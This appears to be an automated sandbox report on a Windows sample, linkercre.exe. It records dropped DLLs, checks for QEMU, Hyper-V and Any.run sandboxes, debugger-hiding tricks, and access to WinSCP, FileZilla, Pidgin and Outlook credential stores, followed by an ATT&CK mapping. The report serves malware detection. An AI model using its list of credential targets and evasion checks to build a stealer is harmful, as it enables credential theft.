      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\freebl3.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-console-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\msvcp140.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\nssdbm3.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\nss3.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\vcruntime140.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l2-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\ucrtbase.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\linkercre.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: linkercre.exe, 00000000.00000002.371329640.0000000002B40000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43AD6 rdtsc 0_2_02B43AD6
      Source: C:\Users\user\Desktop\linkercre.exeWindow / User API: threadDelayed 1119Jump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\softokn3.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\nssdbm3.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l2-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-util-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\freebl3.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-console-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
      Source: C:\Users\user\Desktop\linkercre.exe TID: 4880Thread sleep count: 1119 > 30Jump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeThread sleep count: Count: 1119 delay: -5Jump to behavior
      Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
      Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmpBinary or memory string: vmicvss
      Source: linkercre.exe, 00000000.00000002.371329640.0000000002B40000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43AD6 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00400000,00000000,000000000_2_02B43AD6
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\linkercre.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43AD6 rdtsc 0_2_02B43AD6
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B41CAF LdrInitializeThunk,0_2_02B41CAF
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B42EAD mov eax, dword ptr fs:[00000030h]0_2_02B42EAD
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43481 mov eax, dword ptr fs:[00000030h]0_2_02B43481
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B4340B mov eax, dword ptr fs:[00000030h]0_2_02B4340B
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B40C6F mov eax, dword ptr fs:[00000030h]0_2_02B40C6F
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B433E3 mov eax, dword ptr fs:[00000030h]0_2_02B433E3
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B42BDC mov eax, dword ptr fs:[00000030h]0_2_02B42BDC
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B41921 mov eax, dword ptr fs:[00000030h]0_2_02B41921
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B4115E mov eax, dword ptr fs:[00000030h]0_2_02B4115E
      Source: C:\Users\user\Desktop\linkercre.exeProcess created: C:\Users\user\Desktop\linkercre.exe 'C:\Users\user\Desktop\linkercre.exe' Jump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B4289A cpuid 0_2_02B4289A
      Source: C:\Users\user\Desktop\linkercre.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\linkercre.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
      Tries to harvest and steal ftp login credentialsShow sources
      Source: C:\Users\user\Desktop\linkercre.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
      Tries to steal Instant Messenger accounts or passwordsShow sources
      Source: C:\Users\user\Desktop\linkercre.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
      Tries to steal Mail credentials (via file access)Show sources
      Source: C:\Users\user\Desktop\linkercre.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection11Virtualization/Sandbox Evasion23OS Credential Dumping1Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection11Credentials in Registry2Process Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Credentials In Files1Virtualization/Sandbox Evasion23SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Information Discovery33VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet